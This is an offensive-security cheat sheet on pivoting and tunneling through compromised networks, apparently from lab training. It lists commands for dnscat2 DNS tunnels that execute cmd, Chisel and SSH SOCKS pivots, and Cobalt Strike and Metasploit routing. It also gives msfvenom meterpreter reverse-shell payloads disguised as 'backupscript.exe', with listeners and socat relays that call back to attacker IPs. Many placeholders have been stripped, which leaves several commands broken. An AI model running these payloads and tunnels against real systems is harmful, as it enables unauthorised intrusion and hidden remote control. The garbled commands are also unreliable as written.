# Pivoting, Tunneling and Forwarding ## Advanced Tunneling Methods ### DNS Tunneling ```powershell # Start dnscat2 Server sudo ruby dnscat2.rb --dns host=,port=53,domain=inlanefreight.local --no-cache # Import Module Import-Module .\dnscat2.ps1 # Gain Connection Start-Dnscat2 -DNSserver -Domain i -PreSharedSecret -Exec cmd # Interact With Session windows -i ``` ### SOCKS5 With Chisel ```bash # Server Side ./chisel server -v -p 1234 --socks5 # Target ./chisel client -v 10.129.202.64:1234 socks # Now we can use proxychains socks5 127.0.0.1 1080 ``` ### Chisel Reverse Pivot ```bash # Server Side sudo ./chisel server --reverse -v -p 1234 --socks5 # Target Side ./chisel client -v 10.10.14.17:1234 R:socks # cProxychains socks5 127.0.0.1 1080 ``` ### RDP & Socks Tunneling with SockOverRDP ```bash # Load DLL regsvr32.exe SocksOverRDP-Plugin.dll # Proxifier 127.0.0.1:1080 over sock5 ``` *** ## Dynamic Port Forwarding (SSH + Socks) ### Local Port Forward SSH It sends the data from `` to ` Can be any port # Remote Port -> The port where the target service is listening on ssh -L :127.0.0.1: # Confirm Port Forwarding netstat -antp | grep # Forwarding Several Ports ssh -L :localhost:

:localhost: @ ``` ### SSH Tunneling over SOCKS Proxy ```bash # SSH Command ssh -D 1080 @ # Check Proxychains Conf File /etc/proxychains.conf socks4 127.0.0.1 1080 ``` ### Reverse Port Forwarding SSH ```bash # Generate Reverse Shell, with the IP of the internal host. msfvenom -p windows/x64/meterpreter/reverse_https lhost= -f exe -o backupscript.exe LPORT=8080 # Set lport 8000 # set lhost 127.0.0.1 # Reverse Port Forward ssh -R :8080:0.0.0.0:8000 ubuntu@ -vN ``` ### Cobalt Tunneling & Port Forwarding ```bash # Socks4 Proxy socks 1080 # socks5 socks 1080 socks5 disableNoAuth socks_user socks_password enableLogging # Reverse Port Forward rportfwd ``` ### MSF Socks Proxy ```bash use auxiliary/server/socks_proxy set srvport 1080 set servhost 0.0.0.0 set version 4a # Verify Proxy runs jobs ``` ### Metasploit Autoroute ```bash use post/multi/manage/autoroute set session set subnet run # Shorter Method run autoroute -s /24 ``` ### Metasploit Port Forwarding ```bash portfwd add -l -p -r ``` ### Metasploit Reverse Forwarding ```bash portfwd add -R -l -p -L # Setup Listener set payload windows/x64/meterpreter/reverse_tcp set lport set lhost 0.0.0.0 run # Create Payload msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= -f exe -o backupscript.exe LPORT= ``` *** ## Port Forwarding Tools ### Plink ```powershell plink -D 9050 ubuntu@ ``` ### Proxifier Proxifier is a Windows tool that creates a tunneled network for desktop client applications and allows it to operate through a SOCKS or HTTPS proxy and allows for proxy chaining. ### Sshuttle ```bash sshuttle -r ubuntu@10.129.202.64 -v ``` ### Rpivot Rpivot is a reverse SOCKS proxy tool written in Python for SOCKS tunneling. ```bash # Setup Server python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0 # Upload client.py to Target # On Target machine python2.7 client.py --server-ip --server-port 9999 ``` ### Netsh ```powershell # Example: netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25 netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress= connectport=3389 connectaddress= # Verify Netsh netsh.exe interface portproxy show v4tov4 ``` ### SoCat #### Socat Listener Reverse Shell ```bash # Example: socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80 socat TCP4-LISTEN:,fork TCP4:10.10.14.18: # Generate Payload msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=8080 # msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_https set lhost 0.0.0.0 set lport 80 run ``` #### Socat Redirection with Bind Shells ```bash # Example: socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443 socat TCP4-LISTEN:,fork TCP4:172.16.5.19: ```